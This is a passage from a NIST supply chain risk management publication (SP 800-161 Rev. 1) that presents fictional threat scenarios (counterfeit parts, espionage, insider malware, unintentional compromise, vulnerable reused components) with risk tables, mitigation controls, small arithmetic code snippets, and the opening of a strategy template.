To support the threat scenario, the agency created a fictitious threat source described as a group
motivated by profit with vast experience creating counterfeit solutions. The counterfeiter is able
to make a high profit margin by creating and selling the counterfeits, which are visually identical
to their genuine counterparts but use lower-quality materials. The counterfeiters have the
resources to copy most trademark and other identifying characteristics and insert counterfeits
into a supply chain commonly used by the enterprise with little to no risk of detection. The
counterfeit product is appealing to unaware purchasing authorities as it is generally offered at a
discount and sold as excess inventory or stockpile.
If an inferior quality element was inserted into the system, it would likely fail more often than
expected, causing reduced functionality of the system. In the event of a large number of
counterfeit products randomly integrating with genuine parts in the system, the number and
severity of unexpected outages could grow significantly. The agency and integrator decided that
the chances that a counterfeit product could be purchased to maintain the system and the
estimated potential impact of such an event were high enough to warrant further evaluation.
Threat Scenario Analysis
The person(s) who purchase the element from a supplier would be the first affected by a
counterfeit product. Policy requires that they attempt to purchase a genuine product from vetted
suppliers. This individual would have to be led to believe that the product is genuine. As the
counterfeit product in question is visually identical to the element desired and offered at a
discount, there is a high chance that the counterfeit will be purchased. One will be tested to
ensure functionality, and then the items will be placed into storage.
When one of the elements in the system needs to be replaced, an engineer will install a
counterfeit, quickly test to ensure that it is running properly, and record the change. It could take
two years for the counterfeit product to fail, and up to 200 counterfeit elements could be inserted
into the system before the first sign of failure. If all of the regularly replaced elements are
substituted for counterfeits and each counterfeit fails after two years, the cost of the system
would increase by $160,000 in 10 years. The requisite maintenance time would also cost the
integration company in personnel and other expenses.
When a counterfeit fails, it will take approximately one to four hours to diagnose and replace the
element. During this time, productivity is severely reduced. If more than one of the elements fails
at the same time, the system could fail entirely. This could cause significant damage to agency
operations and violate the 99.9 % uptime requirements set forth in the contract. Moreover, if it
is determined that the element failed because it was counterfeit, additional costs
associated with reporting the counterfeit would be incurred.
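The dollar and downtime figures above can be reproduced under one plausible set of assumptions (the scenario does not spell out its cost model, so treat this sketch as illustrative): if every one of the 100 elements replaced each year is a counterfeit that fails after two years, and each premature failure inside the 10-year horizon costs one additional $200 element, the extra cost comes to $160,000. The sketch also shows how little downtime a 99.9 % uptime requirement allows.

    # Reproducing the $160,000 estimate under stated assumptions (illustrative).
    unit_cost = 200                  # dollars per element
    horizon_years = 10
    replacements_per_year = 100      # 10 % of the 1,000 deployed elements
    counterfeit_life_years = 2

    # Counterfeits installed in years 1-8 fail once inside the 10-year horizon;
    # the failure-driven replacements are assumed genuine thereafter.
    extra_units = sum(
        replacements_per_year
        for install_year in range(1, horizon_years + 1)
        if install_year + counterfeit_life_years <= horizon_years
    )
    print(extra_units * unit_cost)   # 160000

    # The 99.9 % uptime requirement leaves a small annual outage budget:
    allowed_downtime_hours = 365 * 24 * (1 - 0.999)
    print(f"{allowed_downtime_hours:.2f} hours/year")   # 8.76, so two or three
    # 1-4 hour diagnose-and-replace outages can already breach the requirement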
Mitigation Strategy
The following were identified as potential mitigating activities (from Appendix A of NIST SP
800-161, Rev. 1):
• Require developers to perform security testing/evaluation at all post‐design phases of the
SDLC [Ref. SA-11].
• Validate that the information system or system component received is genuine and has
not been altered [Ref. SR-11].
• Incorporate security requirements into the design of information systems (security
engineering) [Ref. PL-8, SC-36].
• Employ supplier diversity requirements [PL-8(2)].
Based on these controls, the agency was able to devise a strategy that would include:
• Acceptance testing: The examination of elements to ensure that they are new, genuine,
and that all associated licenses are valid. Testing methods include, where appropriate,
physical inspection by trained personnel using digital imaging, digital signature
verification, serial/part number verification, and sample electrical testing.
• Increasing security requirements in the design of the system by adding redundant
elements along more critical paths (as determined by a criticality analysis) to minimize
the impact of an element failure.
• Search for alternative vetted suppliers/trusted components.
It was determined that this strategy would cost less than accepting the risk of allowing
counterfeits into the system or modifying the system to accept the upgraded element. The
estimated cost of implementing a more rigorous acquisition and testing program was $80,000.
The cost of increasing security engineering requirements was $100,000.
Table C-3: Scenario 2

Threat Scenario
• Threat Source: Counterfeit telecommunications element introduced into the supply chain.
• Vulnerability: Element no longer produced by the OEM; purchasing authorities unable or unwilling to identify and purchase only genuine elements.
• Threat Event Description: The threat agent inserts their counterfeit element into a trusted distribution chain. Purchasing authorities buy the counterfeit element. Counterfeit elements are installed into the system.
• Threat Event Outcome: The element fails more frequently than before, increasing the number of outages.
• Enterprise units, processes, information, assets, or stakeholders affected: Acquisitions; maintenance; OEM / supplier relations; mission-essential functions.

Risk
• Impact: Moderate: Element failure leads to 1-4-hour system downtime.
• Likelihood: High: Significant motivation by the threat actor and high vulnerability due to the agency’s inability to detect counterfeits, with a 25 % annualized probability of premature component failure.
• Risk Exposure (Impact x Likelihood): Medium: Significant short-term disruptions that lead downtime to exceed the uptime threshold by 0.5 % (e.g., 99.4 % < 99.9 % requirement).
• Acceptable Level of Risk: Low: System must have less than a 10 % annualized probability of missing 99 % uptime thresholds.

Mitigation
• Potential Mitigating Strategies and C-SCRM Controls: Option 1: Increase acceptance testing capabilities [C-SCRM_SA-9; C-SCRM_SA-10] and security requirements in the design of systems [C-SCRM_PL-2], and employ supplier diversity requirements [C-SCRM_PL-8(2)]. Option 2: Modify the system to accept the element upgrade.
• Estimated Cost of Mitigating Strategies: Option 1: $180,000. Option 2: $1 million.
• Change in Likelihood: Low: 8 % annualized probability of component failure.
• Change in Impact: Low: Element failure causes failover to a redundant system component; cost limited to maintenance and replacement.
• Selected Strategies: Agency-level examination and testing; place elements in escrow until they pass defined acceptance testing criteria; increase security engineering; search for multiple suppliers of the element.
• Estimated Residual Risk: Low: 8 % annualized probability of component failures leading to system downtime (i.e., less than 99.9 % uptime).
SCENARIO 3: Industrial Espionage
Background
ABC Company, a semiconductor (SC) company used by the enterprise to produce military and
aerospace systems, is considering a partnership with KXY Co. to leverage their fabrication
facility. This would represent a significant change in the supply chain related to a critical system
element. A committee was formed – including representatives from the enterprise, ABC
Company, and the integration company – to help identify the impacts that the partnership would
have on the enterprise and risk-appropriate mitigation practices to enact when the partnership is
completed.
Environment
The systems of concern are vital to the safety of military and aerospace missions. While not
classified, the element that KXY would be expected to manufacture is unique, patented, and
critical to the operational status of the systems. The loss of availability of the element while the
system is operational could have significant, immediate impacts across multiple agencies and the
civilian populace, including the loss of life and millions of dollars in damages. An initial risk
assessment was conducted using [NIST SP 800-30, Rev. 1], and the existing level of risk for this
was given a score of “Moderate.”
KXY currently operates a state-of-the-art, low-cost wafer fabrication facility with a primarily
commercial focus. The nation-state in which KXY operates has a history of conducting industrial
espionage to gain IP/technology. They have shown interest in semiconductor technology and
provided a significant grant to KXY to expand into the military and aerospace markets. While
KXY does not currently have the testing infrastructure to meet U.S. industry compliance
requirements, the nation-state’s resources are significant and include the ability to provide both
concessions and incentives to help KXY meet those requirements. The key area of concern is
that the nation-state in which KXY operates would be able to use its influence to gain access to
the element or the element’s design.
The committee reviewed the current mitigation strategies in place and determined that ABC
Company, the integration company, and the enterprise had several existing practices to ensure
that the system and all critical elements – as determined by a criticality analysis – met specific
functionality requirements. For example, the system and critical elements are determined to be
compliant with relevant industry standards. As part of their requirements under [NIST SP 800-
53, Rev. 5], the agency had some information protection requirements (Ref. PM-11). In addition,
ABC Company had a sophisticated inventory tracking system that required that most elements be
uniquely tagged using RFID technology or otherwise identified for traceability (Ref. SR-4).
Threat Scenario
Based on past experience, the enterprise decided that KXY’s host nation would likely perform
one of two actions if given access to the technology: 1) sell it to interested parties or 2) insert or
identify vulnerabilities for later exploitation. For either of these threat events to succeed, the host
nation would have to understand the purpose of the element and be given significant access to
the element or element’s design. This could be accomplished with the cooperation of KXY’s
human resources department, through deception, or by physical or electronic theft. Physical theft
would be difficult given existing physical control requirements and inventory control procedures.
For a modified element to be purchased and integrated with the system, it would need to pass
various testing procedures at both the integrator and agency levels. Testing methods currently
utilized include radiographic examination, material analysis, electrical testing, and sample
accelerated life testing. Modifications to identification labels or schemes would need to be
undetectable in a basic examination. In addition, KXY would need to pass routine audits, which
would check KXY’s processes for ensuring the quality and functionality of the element.
The committee decided that, despite existing practices, there was a 30 % chance that the host
nation would have the motivation and ability to develop harmful modifications to the element
without detection, exploit previously unknown vulnerabilities, or provide the means for one of
their allies to do the same. This could result in a loss of availability or integrity of the system,
causing significant harm. Using information from an initial risk assessment accomplished using
[NIST SP 800-30, Rev. 1], the committee identified this as the worst-case scenario with an
impact score of “High.”
There is an approximately 40 % chance that the host nation could and would sell the technology
to interested parties, resulting in a loss of technological superiority. If this scenario occurred,
friendly military and civilian lives could be at risk, intelligence operations would be damaged,
and more money would be required to invest in a new solution. The committee assigned an
impact score for this scenario of “Moderate.”
The committee determined that the overall combined risk exposure for the vulnerability of
concern was “High.”
Mitigating Strategies
Using Appendix A of NIST SP 800-161, Rev. 1 as a base, three broad strategies were identified
by the committee: (1) improve traceability capabilities, (2) increase provenance and information
requirements, and (3) choose another supplier. These three options were analyzed in more detail
to determine specific implementation strategies, their impact on the scenarios, and their
estimated cost to implement. (Specific technologies and techniques are not described in this case
but would be useful in an actual threat scenario evaluation.)
Improve traceability and monitoring capabilities:
• CM-8 – SYSTEM COMPONENT INVENTORY
• IA-1 – POLICY AND PROCEDURES
• SA-10 – DEVELOPER CONFIGURATION MANAGEMENT
• SR-8 – NOTIFICATION AGREEMENTS
• SR-4 – PROVENANCE
Cost = 20 % increase
Impact = 10 % decrease
Increase provenance and information control requirements:
• AC-21 – INFORMATION SHARING
• SR-4 – PROVENANCE
Cost = 20 % increase
Impact = 20 % decrease
Choose another supplier:
• SR-6 – SUPPLIER ASSESSMENTS AND REVIEWS
Cost = 40 % increase
Impact = 80 % decrease
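One quick way to compare the three options above is impact reduction per point of cost increase; the ratio is an illustrative heuristic, not part of this publication's method, and the figures are the committee's estimates repeated from the list above.

    # Rough cost-effectiveness comparison of the three candidate strategies.
    options = {
        "(1) Improve traceability and monitoring": {"cost": 0.20, "impact_reduction": 0.10},
        "(2) Increase provenance and information control": {"cost": 0.20, "impact_reduction": 0.20},
        "(3) Choose another supplier": {"cost": 0.40, "impact_reduction": 0.80},
    }
    for name, o in options.items():
        ratio = o["impact_reduction"] / o["cost"]
        print(f"{name}: {ratio:.2f} impact reduction per unit of cost")
    # (3) scores highest (2.00) by this crude measure, yet the committee's final
    # choice below combines elements of (1) and (2) to reach an acceptable
    # residual risk at a smaller absolute cost increase.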
Based on this analysis, the committee decided to implement a combination of practices:
• Develop and require unique, difficult-to-copy labels or alter labels to discourage cloning
or modification of the component [Ref. SR-3(2)].
• Minimize the amount of information that is shared with suppliers. Require that the
information be secured [Ref. AC-21].
• Require that provenance be kept and updated throughout the SDLC [Ref. SR-4].
With this combination of controls, the estimated residual risk was determined to be equivalent to
the existing risk without the partnership at a cost increase that is less than if the enterprise had
changed suppliers.
Table C-4: Scenario 3

Threat Scenario
• Threat Source: Nation-state with significant resources looking to steal IP.
• Vulnerability: Supplier considering partnership with a company that has a relationship with the threat source.
• Threat Event Description: Nation-state helps KXY meet industry compliance requirements, and ABC Company partners with KXY to develop chips.
• Existing Practices: Strong contractual requirements as to the functionality of the system and elements; comprehensive inventory tracking system at ABC Company; industry compliance requirements.
• Threat Event Outcome: Nation-state threat actor extracts technology, modifies technology, or exploits a previously unknown vulnerability.
• Enterprise units, processes, information, assets, or stakeholders affected: KXY supplier; ABC Company integrator functionality testing; technology users; other federal agencies / customers.

Risk
• Impact: Technology modified / vulnerabilities exploited: High. Technology sold to interested parties: Moderate.
• Likelihood: Moderate for both events.
• Risk Exposure (Impact x Likelihood): High.
• Acceptable Level of Risk: Moderate.

Mitigation
• Potential Mitigating Strategies and C-SCRM Controls: (1) Improve traceability and monitoring capabilities; (2) increase provenance and information control requirements; (3) choose another supplier.
• Estimated Cost of Mitigating Strategies: (1) 20 % increase; (2) 20 % increase; (3) 40 % increase.
• Change in Likelihood: Moderate → Low.
• Change in Impact: High → Moderate.
• Selected Strategies: Develop and require unique, difficult-to-copy labels, or alter labels to discourage cloning or modification of the component [C-SCRM_PE-3]. Minimize the amount of information that is shared with suppliers, and require that the information be secured [C-SCRM_AC-21]. Require that provenance be kept and updated throughout the SDLC [C-SCRM_SR-4].
• Estimated Residual Risk: Moderate: The residual risk was determined to be equivalent to the existing risk without the partnership.
SCENARIO 4: Malicious Code Insertion
Background
ABC Company has decided to perform a threat scenario analysis on a traffic control system. The
scenario is to focus on software vulnerabilities and should provide general recommendations
regarding mitigating practices.
Environment
The system runs nearly automatically and uses computers that run a commonly available
operating system along with centralized servers. The software was created in-house and is
regularly maintained and updated by an integration company on contract for the next five years.
The integration company is large, frequently used by ABC Company in a variety of projects, and
has significant resources to ensure that the system maintains its high availability and integrity
requirements.
Threats to the system could include the loss of power to the system, loss of functionality, or loss
of integrity causing incorrect commands to be processed. Some threat sources could include
nature, malicious outsiders, and malicious insiders. The system is equipped with certain safety
controls, such as backup generator power, redundancy of design, and contingency plans if the
system fails.
Threat Event
ABC Company decided that the most concerning threat event would result from a malicious
insider compromising the integrity of the system. Possible attacks include inserting a worm or a
virus into the system to reduce its ability to function, manually controlling the system from one
of the central servers, or creating a back door in the server to be accessed remotely. Depending
on the skillfulness of the attack, an insider could gain
control of the system, override certain fail-safes, and cause significant damage.
Based on this information, ABC Company developed the following fictitious threat event for
analysis:
John Poindexter, a disgruntled employee of the integration company, decides to insert
some open source malware into a component of the system. He then resigns from the
firm, leaving no trace of his work. The malware has the ability to call home to John and
provide him access to stop or allow network traffic at any or all 50 of the transportation
stations. As a result, unpredictable, difficult-to-diagnose disruptions would occur,
causing significant monetary losses and safety concerns.
After a risk assessment was conducted using [NIST SP 800-30, Rev. 1], management decided
that the acceptable level of risk for this scenario was “Moderate.”
Threat Scenario Analysis
If John were successful, a potential course of events could occur as follows:
John conducts a trial run, shutting off the services of one station for a short time. It would
be discounted as a fluke and have minimal impact. Later, John would create increasingly
frequent disruptions at various stations. These disruptions would cause anger among
employees and customers, as well as some safety concerns. The integration company
would be made aware of the problem and begin to investigate the cause. They would
create a workaround and assume that there was a bug in the system. However, because
the malicious code would be buried and difficult to identify, the integration company
would not discover it. John would then create a major disruption across several
transportation systems at once. The workaround created by the integration company
would fail due to the size of the attack, and all transportation services would be halted.
Travelers would be severely impacted and the media alerted. The method of attack would
be identified and the system modified to prevent John from accessing the system again.
However, the underlying malicious code would remain. Revenue would decrease
significantly for several months. Legal questions would arise. Resources would be
invested in assuring the public that the system was safe.
Mitigating Practices
ABC Company identified the following potential areas for improvement:
• Establish and retain identification of supply chain elements, processes, and actors [SR-4].
• Control access and configuration changes within the SDLC, and require periodic code
reviews (e.g., manual peer-review) [AC-1, AC-2, CM-3].
• Require static code testing [RA-9].
• Establish incident handling procedures [IR-4].
Table C-5: Scenario 4

Threat Scenario
• Threat Source: Integrator – Malicious Code Insertion
• Vulnerability: Minimal oversight of integrator activities; no checks and balances for any
individual inserting a small piece of code
• Threat Event Description: A disgruntled employee of an integrator company inserts malicious
functionality into traffic navigation software and then leaves the ABC Company.
• Existing Practices: Integrator – peer-review process; Acquirer – contract that sets down time,
cost, and functionality requirements
• Threat Event Outcome: 50 large metro locations and 500 instances affected by malware. When
activated, the malware causes major disruptions to traffic.
• Enterprise units, processes, information, assets, or stakeholders affected: Traffic Navigation
System; Implementation company; Legal; Public Affairs

Risk
• Impact: High – Traffic disruptions are major and last for two weeks while a work-around is
created. Malicious code is not discovered and remains a vulnerability.
• Likelihood: High
• Risk Exposure (Impact x Likelihood): High
• Acceptable Level of Risk: Moderate

Mitigation
• Potential Mitigating Strategies and C-SCRM Controls: C-SCRM_AC-1; C-SCRM_AC-2;
C-SCRM_CM-3; C-SCRM_IR-2; C-SCRM_SA-10; C-SCRM_SA-11
• Estimated Cost of Mitigating Strategies: $2.5 million
• Change in Likelihood: High → Low
• Change in Impact: High (no change)
• Selected Strategies: Combination of strategies using the mitigation noted
• Estimated Residual Risk: Moderate
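Where tooling is desired, the qualitative exposure lookup in the table above can be captured as a
small matrix. The sketch below is a minimal illustration, assuming a NIST SP 800-30-style
mapping; only the two cells exercised by this scenario are confirmed by Table C-5.

```python
# Illustrative qualitative risk matrix: (likelihood, impact) -> exposure.
# The full set of pairings is an assumption in the style of NIST SP 800-30,
# Rev. 1; Table C-5 itself only fixes the two cells asserted below.
RISK_MATRIX = {
    ("Low", "Low"): "Low",            ("Low", "Moderate"): "Low",
    ("Low", "High"): "Moderate",      ("Moderate", "Low"): "Low",
    ("Moderate", "Moderate"): "Moderate",
    ("Moderate", "High"): "High",     ("High", "Low"): "Moderate",
    ("High", "Moderate"): "High",     ("High", "High"): "High",
}

def risk_exposure(likelihood: str, impact: str) -> str:
    """Look up the qualitative risk exposure for a likelihood/impact pair."""
    return RISK_MATRIX[(likelihood, impact)]

# Confirmed by Table C-5: High likelihood x High impact -> High exposure.
assert risk_exposure("High", "High") == "High"
# Confirmed by Table C-5: mitigation drops likelihood to Low while impact
# stays High, leaving a Moderate residual risk.
assert risk_exposure("Low", "High") == "Moderate"
```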
SCENARIO 5: Unintentional Compromise
Background
Uninformed insiders replace components with more cost-efficient solutions without
understanding the implications to performance, safety, and long-term costs.
ABC Company has concerns about its acquisition policies and has decided to conduct a threat
scenario analysis to identify mitigating practices. Any practices selected must be applicable to a
variety of projects and have significant success within a year.
Environment
ABC Company acquires many different systems with varying degrees of requirements. Because
of the complexity of the environment, ABC Company officials decide that they should use a
scenario based on an actual past event.
Threat Event
Using an actual event as a basis, the agency designs the following threat event narrative:
Gill, a newly hired program manager, is tasked with reducing the cost of a $5 million
system being purchased to support complex research applications in a unique physical
environment. The system would be responsible for relaying information regarding
temperature, humidity, and toxic chemical detection, as well as storing and analyzing
various data sets. There must not be any unscheduled outages more than 10 seconds long,
or serious safety concerns and the potential destruction of research will occur. ABC
Company’s threat assessment committee determined that the acceptable level of risk for
this type of event has a score of 2/10.
Gill sees that a number of components in the system design are priced high compared
with similar components he has purchased in the commercial acquisition space. Gill asks
John, a junior engineer with the integration company, to replace several load balancers
and routers in the system design to save costs.
Threat Scenario Analysis
ABC Company decides that there are three potential outcomes to the scenario (a probability-weighted sketch follows the list):
1. It is determined that the modifications are inadequate before any are purchased (30 %
chance, no impact);
2. It is determined that the modifications are inadequate during testing (40 % chance, low
impact); or
3. The inadequacy of the modifications is undetected, and the routers are installed in the
system, begin to fail, and create denial-of-service incidents (30 % chance, high impact).
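Because the scenario assigns explicit probabilities to each outcome, the committee's 2/10
threshold can be checked with a simple expected-value calculation. In the sketch below, the
probabilities are the scenario's own, but the numeric impact scores on the 10-point scale are
hypothetical placeholders (the scenario rates outcomes only as no, low, or high impact).

```python
# Probability-weighted view of Scenario 5's three outcomes. The outcome
# probabilities come from the scenario text; the numeric impact scores are
# hypothetical, chosen only to show the arithmetic against the stated
# acceptable risk score of 2/10.
outcomes = [
    ("rejected before purchase", 0.30, 0),  # no impact
    ("rejected during testing",  0.40, 2),  # low impact (assumed score)
    ("installed, then fails",    0.30, 8),  # high impact (assumed score)
]

expected_score = sum(p * score for _, p, score in outcomes)
print(f"Expected impact score: {expected_score:.1f}/10")  # 3.2/10 > 2/10
```

Under these assumed scores, the expected impact exceeds the acceptable level, which is
consistent with the narrative conclusion that mitigation was required.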
Mitigating Strategies
Three potential mitigating strategies are identified:
• Improve the existing training program [Ref. AT-1], and add configuration management
controls to monitor all proposed changes to critical systems [Ref. CM-1];
• Improve the testing requirements [Ref. SA-11]; and
• Require redundancy and heterogeneity in the design of systems [Ref. SC-29, SC-36].
Adding configuration management controls would increase the likelihood that the modifications
would be rejected either at the initial stage or during testing, but it was determined that a
$200,000 investment in training alone could not bring the level of risk to an acceptable level in
the time required.
Improving the testing requirements would increase the likelihood of the modifications being
rejected during testing, but it was determined that no amount of testing alone could bring the
level of risk to an acceptable level.
Requiring redundancy and heterogeneity in the design of the system would significantly reduce
the impact of this and other events of concern but could double the cost of a project. In this
scenario, it was determined that an investment of $2 million would be required to bring the risk
to an acceptable level.
As a result of this analysis, ABC Company decides to implement a combination of practices:
• A mandatory, day-long training program for those handling the acquisition of critical
systems and the addition of configuration management controls that require that changes
be approved by a configuration management board (CMB) ($80,000 initial investment),
• $60,000 investment in testing equipment and software for critical systems and elements,
and
• Redundancy and diversity of design requirements, as deemed appropriate for each
project.
It was determined that this combination of practices would be most cost-effective for a variety of
projects and help mitigate the risk from a variety of threats.
Table C-6: Scenario 5

Threat Scenario
• Threat Source: Internal Employee – Unintentional Compromise
• Vulnerability: Lax training practices
• Threat Event Description: A new acquisition officer (AO) with experience in commercial
acquisition is tasked with reducing hardware costs. The AO sees that a number of components
are priced high and works with an engineer to change the purchase order.
• Existing Practices: Minimal training program that is not considered mandatory; basic testing
requirements for system components
• Threat Event Outcome – three cases: (1) Change is found unsuitable before purchase;
(2) Change is found unsuitable in testing; (3) Change passes testing, and routers are installed
and start to fail, causing denial of service.
• Enterprise units, processes, information, assets, or stakeholders affected: (1) None;
(2) Acquisitions; (3) Acquisitions, System, Users

Risk (per outcome)
• Impact: (1) None; (2) Low; (3) High
• Likelihood: (1) Moderate – 30 %; (2) High – 40 %; (3) Moderate – 30 %
• Risk Exposure (Impact x Likelihood): (1) None; (2) Moderate; (3) Moderate
• Acceptable Level of Risk: (1) Low; (2) Moderate; (3) High

Mitigation (per outcome)
• Potential Mitigating Strategies and SCRM Controls: (1) Improve training program, and require
that changes be approved by CMB; (2) Improve acquisition testing; (3) Improve the design of
the system.
• Estimated Cost of Mitigating Strategies: (1) $200,000; (2) ---; (3) $2 million
• Change in Impact: (1) None – no change; (2) Low – no change; (3) High → Low
• Change in Likelihood: (1) 30 % → 10 %; (2) 40 % → 20 %; (3) 30 % – no change
• New Risk Exposure: (1) None; (2) Low; (3) Moderate
• Selected Strategies: Require mandatory training for those working on critical systems, and
require approval of changes to critical systems by a configuration management board
(cost = $100,000).
• Residual Risk: Low
SCENARIO 6: Vulnerable Reused Components Within Systems
Background
As part of their standard development practices, ABC Company reuses internally developed and
open source system components in the development of their COTS solutions. Recent high-profile
cyber attacks have capitalized on vulnerabilities present in reused system components, and ABC
Company’s customers are demanding increased transparency as a means of mitigating their own
risk exposure.
ABC Company has decided to perform a threat scenario analysis to determine which steps can be
taken to improve the security of their software products and offer customers greater confidence
that ABC Company is taking the necessary steps to protect them from these types of attacks.
Environment
ABC Company is a well-known market leader in the financial planning and analysis (FP&A)
software market. ABC Company's customers rely on its FP&A solution to store, process,
and analyze sensitive financial information (e.g., closing the books).
Threat Event
Apache Struts (a widely used software framework) is a component within ABC
Company's COTS FP&A solution. A vulnerability present in Apache Struts was patched in
March 2021. Motivated by financial gain, opportunistic cyber criminal organizations sought
to capitalize on vulnerabilities in COTS solutions.
ABC Company provides frequent updates to mitigate software vulnerabilities in their COTS
solutions. However, in this case, the software component in question was not included as part of
these updates.
The vulnerability in question is present and exploitable within ABC Company’s FP&A solution.
Threat Scenario Analysis
If the attackers were to discover the vulnerability in ABC Company’s product, a potential course
of events could occur as follows:
A well-resourced cyber-criminal organization could install rogue code in customer
instances of the FP&A solution. Using this rogue code, the cyber criminals could extract
and sell the sensitive, undisclosed financial information of public companies that trade on
global stock markets. Upon discovery of the attack, ABC Company could face significant
reputational harm due to the negative publicity. ABC Company’s customers may engage
in legal action against ABC Company as a result of their failure to appropriately patch
known vulnerabilities in their software products.
Mitigating Strategies
ABC Company identified the following areas for improvement in order to enhance their secure
software development practices and improve the confidence in their products:
• Ensure that developers receive training on secure development practices and are
instructed on the use of vulnerability tooling so that developed software is secure.
• Ensure that reused system components – whether developed internally or open source –
are evaluated as part of a standard process for known vulnerabilities (Ref. SA-15).
• Maintain a system component inventory to aid in maintenance of the software product
throughout its life cycle (Ref. CM-8).
• Continuously monitor system components for vulnerabilities that arise, and ensure that
appropriate processes are in place for expeditious remediation once a fix is available.
Automate this process where possible (Ref. CA-7, RA-5).
Table C-7: Scenario 6

Threat Scenario
• Threat Source: Cyber Criminal Organization – Vulnerable Software Components
• Vulnerability: Failure to understand and monitor the vulnerability state of reused components
used in FP&A software products and to provide timely updates to patch known vulnerabilities
• Threat Event Description: A cyber criminal organization exploits a known vulnerability in an
FP&A software product to install rogue code and gain access to sensitive financial information
contained within the application instances used by ABC Company customers.
• Existing Practices: ABC Company has a comprehensive and secure SDLC that focuses on
identifying and mitigating vulnerabilities within their in-house developed code. ABC Company
releases frequent patches to close vulnerabilities in their products.
• Threat Event Outcome: More than 10 major ABC Company customers are compromised as a
result of the vulnerable software. Negative press surrounding the attack has led to a significant
impact (i.e., a 5 % drop) on ABC Company's share price. ABC Company's competitors are
capitalizing on the attack and using their own security practices to differentiate themselves and
gain market share. ABC Company faces significant legal costs due to action taken by affected
customers. ABC Company has seen a 5 % abnormal customer churn in the year following the
attack.
• Enterprise units, processes, information, assets, or stakeholders affected: FP&A Software
Products Division

Risk
• Impact: High – $350 million in aggregate cost, substantial reputational impact, and loss of
market share, share price, and customers
• Likelihood: High – 20 % annual probability of occurrence
• Risk Exposure (Impact x Likelihood): High – $70 million loss exposure
• Acceptable Level of Risk: Moderate – $20 million: ABC Company's Risk Committee has
stated that it is unwilling to lose more than $20 million due to a single cybersecurity event
affecting customer products.

Mitigation
• Potential Mitigating Strategies and SCRM Controls:
o Ensure that developers receive training on secure development practices and are
instructed on the use of vulnerability tooling so that developed software is secure.
o Ensure that reused system components – whether developed internally or open source –
are evaluated as part of a standard process for known vulnerabilities (Ref. SA-15).
o Maintain a system component inventory to aid in the maintenance of the software
product throughout its life cycle (Ref. CM-8).
o Continuously monitor system components for vulnerabilities that arise, and ensure that
appropriate processes are in place for expeditious remediation once a fix is available.
Automate this process where possible (Ref. CA-7, RA-5).
• Estimated Cost of Mitigating Strategies: Developer training – $500K–$800K; System
Component Inventory Process – $1.2–$1.5 million; Continuous Monitoring of System
Component Vulnerabilities – $800K–$1.2 million
• Change in Impact: High – $350 million (no change based on identified controls)
• Change in Likelihood: High → Low – 5 % annual probability of occurrence
• New Risk Exposure: Moderate – $17.5 million
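The dollar figures in Table C-7 follow mechanically from the exposure formula
(Impact x Likelihood). A quick check of the arithmetic:

```python
# Annualized loss exposure for Scenario 6, reproducing the dollar figures
# in Table C-7: exposure = impact ($) x annual probability of occurrence.
impact = 350_000_000              # aggregate cost of a successful attack

exposure_before = impact * 0.20   # High likelihood: 20 % per year
exposure_after = impact * 0.05    # Low likelihood after mitigation: 5 %

print(f"Before mitigation: ${exposure_before:,.0f}")  # $70,000,000
print(f"After mitigation:  ${exposure_after:,.0f}")   # $17,500,000
# The $17.5 million residual sits below the Risk Committee's $20 million
# ceiling, which is why the new risk exposure is rated Moderate.
```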
APPENDIX D: C-SCRM TEMPLATES [42]
1. C-SCRM STRATEGY AND IMPLEMENTATION PLAN
To address cybersecurity risks throughout the supply chain, enterprises develop a C-SCRM
strategy. The C-SCRM strategy, accompanied by an implementation plan, is at the enterprise
level (Level 1), though different mission and business areas (Level 2) may further tailor the C-
SCRM strategy to address specific mission and business needs, as outlined at the enterprise level.
The C-SCRM strategy and implementation plan should anchor to the overarching enterprise risk
management strategy and comply with applicable laws, executive orders, directives, and
regulations.
Typical components of the strategy and implementation plan, as outlined in the below template,
include strategic approaches to reducing an enterprise’s supply chain risk exposure via
enterprise-wide risk management requirements, ownership, risk tolerance, roles and
responsibilities, and escalation criteria. Note that the strategy and implementation plan may be
developed as a single document or split apart into multiple documents. In any case, these C-
SCRM outputs should be closely related in nature.
1.1. C-SCRM Strategy and Implementation Plan Template
1.1.1. Purpose
Outline the enterprise’s high-level purpose for the strategy and implementation document,
aligning that purpose with the enterprise’s mission, vision, and values. Describe where the
strategy and implementation document resides relative to other C-SCRM documentation that must
be maintained at various tiers. Provide clear direction around the enterprise’s C-SCRM
priorities and its general approach for achieving those priorities.
Sample Text
The purpose of this strategy and implementation document is to provide a strategic roadmap for
implementing effective C-SCRM capabilities, practices, processes, and tools within the
enterprise in support of its vision, mission, and values.
The strategic approach is organized around a set of objectives that span the scope of the
enterprise’s mission and reflect a phased, achievable, strategic approach to ensuring the
successful implementation and effectiveness of C-SCRM efforts across the enterprise.
This strategy and implementation document discusses the necessary core functions, roles,
responsibilities, and the approach that the enterprise will take to implement C-SCRM capabilities
within the enterprise. As mission and business policies and system plans are developed and
completed, they will be incorporated as attachments to this document. All three tiers of
documentation should be periodically reviewed together to ensure cohesion and consistency.
[42] Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation's Cybersecurity.
The focus of this strategy and implementation plan is intentionally targeted at establishing a core
foundational capability. These baseline functions – such as defining policies, ownership, and
dedicated resources – will ensure that the enterprise can expand and mature its C-SCRM
capabilities over time. This plan also acknowledges and emphasizes the need to raise awareness
among staff and ensure proper training in order to understand C-SCRM and grow the
competencies necessary to be able to perform C-SCRM functions.
This initial strategy and implementation plan also recognizes dependencies on industry-wide
coordination efforts, processes, and decisions. As government and industry-wide direction,
process guidance, and requirements are clarified and communicated, the enterprise will update
and refine its strategy and operational implementation plans and actions.
1.1.2. Authority and Compliance
List the laws, executive orders, directives, regulations, policies, standards, and guidelines that
govern C-SCRM Strategy and Implementation.
Sample Text
• Legislation
o Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology Act (SECURE Technology Act) of 2018
o Federal Information Security Modernization Act of 2014
o Section 889 of the 2019 National Defense Authorization Act – “Prohibition on
Certain Telecommunications and Video Surveillance Services or Equipment”
o Gramm-Leach-Bliley Act
o Health Insurance Portability and Accountability Act
o Executive Order 14028 of May 12, 2021, Improving the Nation’s Cybersecurity
• Regulations
o NYDFS 23 NYCRR 500: Section 500.11 Third Party Service Provider Security
Policy
o CIP-013-1: Cyber Security – Supply Chain Risk Management
o FFIEC Information Security Handbook II.C.20: Oversight of Third-Party Service
Providers
• Guidelines
o NIST 800-53, Revision 5: CA-5, SR-1, SR-2, SR-3
o NIST 800-37, Revision 2
o NIST 800-161, Revision 1: Appendix C
o ISO 28000:2007
1.1.3. Strategic Objectives
